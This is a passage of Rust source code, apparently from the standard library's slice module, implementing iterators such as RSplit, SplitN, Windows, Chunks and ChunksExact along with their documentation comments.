fn next(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().position(|x| (*pred)(x))
};
let idx = idx_opt.map(|idx| idx + 1).unwrap_or(self.v.len());
if idx == self.v.len() {
self.finished = true;
}
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = tail;
Some(head)
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished {
(0, Some(0))
} else {
// if the predicate doesn't match anything, we yield one slice
// if it matches every element, we yield len+1 empty slices.
(1, Some(self.v.len() + 1))
}
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> DoubleEndedIterator for SplitInclusiveMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = if self.v.is_empty() {
None
} else {
// work around borrowck limitations
let pred = &mut self.pred;
// The last index of self.v is already checked and found to match
// by the last iteration, so we start searching a new match
// one index to the left.
let remainder = &self.v[..(self.v.len() - 1)];
remainder.iter().rposition(|x| (*pred)(x))
};
let idx = idx_opt.map(|idx| idx + 1).unwrap_or(0);
if idx == 0 {
self.finished = true;
}
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = head;
Some(tail)
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> FusedIterator for SplitInclusiveMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over subslices separated by elements that match a predicate
/// function, starting from the end of the slice.
///
/// This struct is created by the [`rsplit`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [11, 22, 33, 0, 44, 55];
/// let iter = slice.rsplit(|num| *num == 0);
/// ```
///
/// [`rsplit`]: ../../std/primitive.slice.html#method.rsplit
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "slice_rsplit", since = "1.27.0")]
#[derive(Clone)] // Is this correct, or does it incorrectly require `T: Clone`?
pub struct RSplit<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: Split<'a, T, P>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplit<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { inner: Split::new(slice, pred) }
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplit<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplit")
.field("v", &self.inner.v)
.field("finished", &self.inner.finished)
.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> Iterator for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
self.inner.next_back()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> DoubleEndedIterator for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
self.inner.next()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> SplitIter for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a [T]> {
self.inner.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T, P> FusedIterator for RSplit<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the subslices of the vector which are separated
/// by elements that match `pred`, starting from the end of the slice.
///
/// This struct is created by the [`rsplit_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [11, 22, 33, 0, 44, 55];
/// let iter = slice.rsplit_mut(|num| *num == 0);
/// ```
///
/// [`rsplit_mut`]: ../../std/primitive.slice.html#method.rsplit_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "slice_rsplit", since = "1.27.0")]
pub struct RSplitMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: SplitMut<'a, T, P>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { inner: SplitMut::new(slice, pred) }
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitMut")
.field("v", &self.inner.v)
.field("finished", &self.inner.finished)
.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> SplitIter for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a mut [T]> {
self.inner.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> Iterator for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
self.inner.next_back()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> DoubleEndedIterator for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
self.inner.next()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T, P> FusedIterator for RSplitMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// An private iterator over subslices separated by elements that
/// match a predicate function, splitting at most a fixed number of
/// times.
#[derive(Debug)]
struct GenericSplitN<I> {
iter: I,
count: usize,
}
impl<T, I: SplitIter<Item = T>> Iterator for GenericSplitN<I> {
type Item = T;
#[inline]
fn next(&mut self) -> Option<T> {
match self.count {
0 => None,
1 => {
self.count -= 1;
self.iter.finish()
}
_ => {
self.count -= 1;
self.iter.next()
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let (lower, upper_opt) = self.iter.size_hint();
(lower, upper_opt.map(|upper| cmp::min(self.count, upper)))
}
}
/// An iterator over subslices separated by elements that match a predicate
/// function, limited to a given number of splits.
///
/// This struct is created by the [`splitn`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.splitn(2, |num| *num % 3 == 0);
/// ```
///
/// [`splitn`]: ../../std/primitive.slice.html#method.splitn
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitN<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<Split<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitN<'a, T, P> {
#[inline]
pub(super) fn new(s: Split<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitN<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitN").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a
/// predicate function, limited to a given number of splits, starting
/// from the end of the slice.
///
/// This struct is created by the [`rsplitn`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.rsplitn(2, |num| *num % 3 == 0);
/// ```
///
/// [`rsplitn`]: ../../std/primitive.slice.html#method.rsplitn
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RSplitN<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<RSplit<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitN<'a, T, P> {
#[inline]
pub(super) fn new(s: RSplit<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitN<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitN").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a predicate
/// function, limited to a given number of splits.
///
/// This struct is created by the [`splitn_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.splitn_mut(2, |num| *num % 3 == 0);
/// ```
///
/// [`splitn_mut`]: ../../std/primitive.slice.html#method.splitn_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitNMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<SplitMut<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitNMut<'a, T, P> {
#[inline]
pub(super) fn new(s: SplitMut<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitNMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitNMut").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a
/// predicate function, limited to a given number of splits, starting
/// from the end of the slice.
///
/// This struct is created by the [`rsplitn_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.rsplitn_mut(2, |num| *num % 3 == 0);
/// ```
///
/// [`rsplitn_mut`]: ../../std/primitive.slice.html#method.rsplitn_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RSplitNMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<RSplitMut<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitNMut<'a, T, P> {
#[inline]
pub(super) fn new(s: RSplitMut<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitNMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitNMut").field("inner", &self.inner).finish()
}
}
forward_iterator! { SplitN: T, &'a [T] }
forward_iterator! { RSplitN: T, &'a [T] }
forward_iterator! { SplitNMut: T, &'a mut [T] }
forward_iterator! { RSplitNMut: T, &'a mut [T] }
/// An iterator over overlapping subslices of length `size`.
///
/// This struct is created by the [`windows`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['r', 'u', 's', 't'];
/// let iter = slice.windows(2);
/// ```
///
/// [`windows`]: ../../std/primitive.slice.html#method.windows
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Windows<'a, T: 'a> {
v: &'a [T],
size: usize,
}
impl<'a, T: 'a> Windows<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Windows<'_, T> {
fn clone(&self) -> Self {
Windows { v: self.v, size: self.size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for Windows<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.size > self.v.len() {
None
} else {
let ret = Some(&self.v[..self.size]);
self.v = &self.v[1..];
ret
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.size > self.v.len() {
(0, Some(0))
} else {
let size = self.v.len() - self.size + 1;
(size, Some(size))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = self.size.overflowing_add(n);
if end > self.v.len() || overflow {
self.v = &[];
None
} else {
let nth = &self.v[n..end];
self.v = &self.v[n + 1..];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.size > self.v.len() {
None
} else {
let start = self.v.len() - self.size;
Some(&self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
// SAFETY: since the caller guarantees that `i` is in bounds,
// which means that `i` cannot overflow an `isize`, and the
// slice created by `from_raw_parts` is a subslice of `self.v`
// thus is guaranteed to be valid for the lifetime `'a` of `self.v`.
unsafe { from_raw_parts(self.v.as_ptr().add(idx), self.size) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for Windows<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.size > self.v.len() {
None
} else {
let ret = Some(&self.v[self.v.len() - self.size..]);
self.v = &self.v[..self.v.len() - 1];
ret
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = self.v.len().overflowing_sub(n);
if end < self.size || overflow {
self.v = &[];
None
} else {
let ret = &self.v[end - self.size..end];
self.v = &self.v[..end - 1];
Some(ret)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for Windows<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for Windows<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for Windows<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Windows<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`chunks`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks(2);
/// ```
///
/// [`chunks`]: ../../std/primitive.slice.html#method.chunks
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Chunks<'a, T: 'a> {
v: &'a [T],
chunk_size: usize,
}
impl<'a, T: 'a> Chunks<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Chunks<'_, T> {
fn clone(&self) -> Self {
Chunks { v: self.v, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for Chunks<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let chunksz = cmp::min(self.v.len(), self.chunk_size);
let (fst, snd) = self.v.split_at(chunksz);
self.v = snd;
Some(fst)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &[];
None
} else {
let end = match start.checked_add(self.chunk_size) {
Some(sum) => cmp::min(self.v.len(), sum),
None => self.v.len(),
};
let nth = &self.v[start..end];
self.v = &self.v[end..];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let start = (self.v.len() - 1) / self.chunk_size * self.chunk_size;
Some(&self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
None => self.v.len(),
Some(end) => cmp::min(end, self.v.len()),
};
// SAFETY: the caller guarantees that `i` is in bounds,
// which means that `start` must be in bounds of the
// underlying `self.v` slice, and we made sure that `end`
// is also in bounds of `self.v`. Thus, `start` cannot overflow
// an `isize`, and the slice constructed by `from_raw_parts`
// is a subslice of `self.v` which is guaranteed to be valid
// for the lifetime `'a` of `self.v`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), end - start) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for Chunks<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let chunksz = if remainder != 0 { remainder } else { self.chunk_size };
let (fst, snd) = self.v.split_at(self.v.len() - chunksz);
self.v = fst;
Some(snd)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
Some(res) => cmp::min(res, self.v.len()),
None => self.v.len(),
};
let nth_back = &self.v[start..end];
self.v = &self.v[..start];
Some(nth_back)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for Chunks<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for Chunks<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for Chunks<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Chunks<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`chunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks_mut(2);
/// ```
///
/// [`chunks_mut`]: ../../std/primitive.slice.html#method.chunks_mut
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct ChunksMut<'a, T: 'a> {
v: &'a mut [T],
chunk_size: usize,
}
impl<'a, T: 'a> ChunksMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for ChunksMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let sz = cmp::min(self.v.len(), self.chunk_size);
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(sz);
self.v = tail;
Some(head)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let end = match start.checked_add(self.chunk_size) {
Some(sum) => cmp::min(self.v.len(), sum),
None => self.v.len(),
};
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(end);
let (_, nth) = head.split_at_mut(start);
self.v = tail;
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let start = (self.v.len() - 1) / self.chunk_size * self.chunk_size;
Some(&mut self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
None => self.v.len(),
Some(end) => cmp::min(end, self.v.len()),
};
// SAFETY: see comments for `Chunks::__iterator_get_unchecked`.
//
// Also note that the caller also guarantees that we're never called
// with the same index again, and that no other methods that will
// access this subslice are called, so it is valid for the returned
// slice to be mutable.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), end - start) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for ChunksMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let sz = if remainder != 0 { remainder } else { self.chunk_size };
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - sz);
self.v = head;
Some(tail)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
Some(res) => cmp::min(res, self.v.len()),
None => self.v.len(),
};
let (temp, _tail) = mem::replace(&mut self.v, &mut []).split_at_mut(end);
let (head, nth_back) = temp.split_at_mut(start);
self.v = head;
Some(nth_back)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for ChunksMut<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksMut<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for ChunksMut<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksMut<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last
/// up to `chunk_size-1` elements will be omitted but can be retrieved from
/// the [`remainder`] function from the iterator.
///
/// This struct is created by the [`chunks_exact`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks_exact(2);
/// ```
///
/// [`chunks_exact`]: ../../std/primitive.slice.html#method.chunks_exact
/// [`remainder`]: ChunksExact::remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub struct ChunksExact<'a, T: 'a> {
v: &'a [T],
rem: &'a [T],
chunk_size: usize,
}
impl<'a, T> ChunksExact<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
let fst_len = slice.len() - rem;
// SAFETY: 0 <= fst_len <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_unchecked(fst_len) };
Self { v: fst, rem: snd, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub fn remainder(&self) -> &'a [T] {
self.rem
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> Clone for ChunksExact<'_, T> {
fn clone(&self) -> Self {
ChunksExact { v: self.v, rem: self.rem, chunk_size: self.chunk_size }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> Iterator for ChunksExact<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.chunk_size);
self.v = snd;
Some(fst)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &[];
None
} else {
let (_, snd) = self.v.split_at(start);
self.v = snd;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
// SAFETY: mostly identical to `Chunks::__iterator_get_unchecked`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for ChunksExact<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let (fst, snd) = self.v.split_at(self.v.len() - self.chunk_size);
self.v = fst;
Some(snd)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = start + self.chunk_size;
let nth_back = &self.v[start..end];
self.v = &self.v[..start];
Some(nth_back)
}
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> ExactSizeIterator for ChunksExact<'_, T> {
fn is_empty(&self) -> bool {
self.v.is_empty()
}
}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for ChunksExact<'_, T> {}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<T> FusedIterator for ChunksExact<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for ChunksExact<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last up to
/// `chunk_size-1` elements will be omitted but can be retrieved from the
/// [`into_remainder`] function from the iterator.
///
/// This struct is created by the [`chunks_exact_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks_exact_mut(2);
/// ```
///
/// [`chunks_exact_mut`]: ../../std/primitive.slice.html#method.chunks_exact_mut
/// [`into_remainder`]: ChunksExactMut::into_remainder
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub struct ChunksExactMut<'a, T: 'a> {
v: &'a mut [T],
rem: &'a mut [T],
chunk_size: usize,
}
impl<'a, T> ChunksExactMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], chunk_size: usize) -> Self {
let rem = slice.len() % chunk_size;
let fst_len = slice.len() - rem;
// SAFETY: 0 <= fst_len <= slice.len() by construction above
let (fst, snd) = unsafe { slice.split_at_mut_unchecked(fst_len) };
Self { v: fst, rem: snd, chunk_size }
}
/// Returns the remainder of the original slice that is not going to be
/// returned by the iterator. The returned slice has at most `chunk_size-1`
/// elements.
#[stable(feature = "chunks_exact", since = "1.31.0")]
pub fn into_remainder(self) -> &'a mut [T] {
self.rem
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> Iterator for ChunksExactMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(self.chunk_size);
self.v = tail;
Some(head)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let n = self.v.len() / self.chunk_size;
(n, Some(n))
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let (_, snd) = tmp.split_at_mut(start);
self.v = snd;
self.next()
}
}
#[inline]
fn last(mut self) -> Option<Self::Item> {
self.next_back()
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
// SAFETY: see comments for `ChunksMut::__iterator_get_unchecked`.
unsafe { from_raw_parts_mut(self.v.as_mut_ptr().add(start), self.chunk_size) }
}
}
#[stable(feature = "chunks_exact", since = "1.31.0")]
impl<'a, T> DoubleEndedIterator for ChunksExactMut<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.v.len() < self.chunk_size {
None
} else {
let tmp = mem::replace(&mut self.v, &mut []);
let tmp_len = tmp.len();
let (head, tail) = tmp.split_at_mut(tmp_len - self.chunk_size);
self.v = head;
Some(tail)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &mut [];
None
} else {
